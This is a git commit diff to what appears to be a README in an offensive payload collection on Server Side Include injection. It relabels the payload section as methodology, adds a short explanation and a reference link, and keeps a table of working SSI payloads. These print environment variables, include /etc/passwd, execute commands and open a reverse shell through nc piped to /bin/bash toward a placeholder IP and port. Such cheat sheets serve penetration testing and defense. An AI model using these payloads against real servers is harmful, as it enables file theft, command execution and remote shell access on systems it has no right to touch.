Normalize page header for SSTI, SAML, SSI

2025-12-20 14:22:38 -08:00 · 2024-11-10 19:14:16 +01:00
parent 1a3e605d64
commit a338b2f12a
13 changed files with 105 additions and 44 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -5,21 +5,24 @@

 ## Summary

-* [Payloads](#payloads)
+* [Methodology](#methodology)
 * [References](#references)


-## Payloads
+## Methodology
+
+SSI Injection occurs when an attacker can input Server Side Include directives into a web application. SSIs are directives that can include files, execute commands, or print environment variables/attributes. If user input is not properly sanitized within an SSI context, this input can be used to manipulate server-side behavior and access sensitive information or execute commands.

 | Description             | Payload |
 |-------------------------|---------|
 | Print a date            | `<!--#echo var="DATE_LOCAL" -->` |
 | Print all the variables | `<!--#printenv -->` |
-| Include a file          | `<!--#include file="includefile.html" -->` |
+| Include a file          | `<!--#include file="/etc/passwd" -->` |
 | Execute commands        | `<!--#exec cmd="ls" -->` |
 | Doing a reverse shell   | `<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->` |


 ## References

+* [Exploiting Server Side Include Injection - n00py - August 15, 2017](https://www.n00py.io/2017/08/exploiting-server-side-include-injection/)
 * [Server-Side Includes (SSI) Injection - Weilin Zhong, Nsrav - December 4, 2019](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)